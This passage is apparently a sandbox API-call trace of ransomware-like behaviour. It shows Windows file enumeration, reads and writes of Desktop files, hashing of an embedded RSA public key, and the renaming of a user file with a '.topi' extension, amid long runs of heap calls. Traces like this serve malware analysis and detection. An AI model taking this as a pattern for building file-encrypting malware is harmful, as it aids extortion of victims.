(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90f0 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.560] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.561] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3bf8 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.562] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x104cf, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x104cf, lpOverlapped=0x0) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.562] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x104d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.562] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.562] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.563] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.563] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.563] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.563] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.563] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.563] CloseHandle (hObject=0x6a8) returned 1 [0094.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.564] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.564] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OEL7b8_7aVATtdQDgj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oel7b8_7avattdqdgj.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OEL7b8_7aVATtdQDgj.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oel7b8_7avattdqdgj.flv.topi")) returned 1 [0094.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.565] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.566] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x289b69a0, ftCreationTime.dwHighDateTime=0x1d5c5f9, ftLastAccessTime.dwLowDateTime=0xbbcb8a70, ftLastAccessTime.dwHighDateTime=0x1d5bf82, ftLastWriteTime.dwLowDateTime=0xbbcb8a70, ftLastWriteTime.dwHighDateTime=0x1d5bf82, nFileSizeHigh=0x0, nFileSizeLow=0x12d21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p9_9SN.jpg", cAlternateFileName="")) returned 1 [0094.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.566] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.566] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p9_9SN.jpg") returned=".jpg" [0094.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p9_9SN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p9_9sn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.566] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=77089) returned 1 [0094.566] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.569] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12cfb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.569] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.570] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.570] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.571] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x12d21, lpOverlapped=0x0) returned 1 [0094.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.571] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.571] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.572] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.572] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.572] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.572] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.572] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.572] GetLastError () returned 0x0 [0094.572] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.572] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.572] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.572] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.572] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.572] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.572] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12d20) returned 0x9a06a00 [0094.573] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3bf8 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3c40 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.573] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.573] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90f0 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d90d8 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.574] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.574] GetCurrentThreadId () returned 0x8c4 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1c10 [0094.574] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.575] RtlAllocateHeap 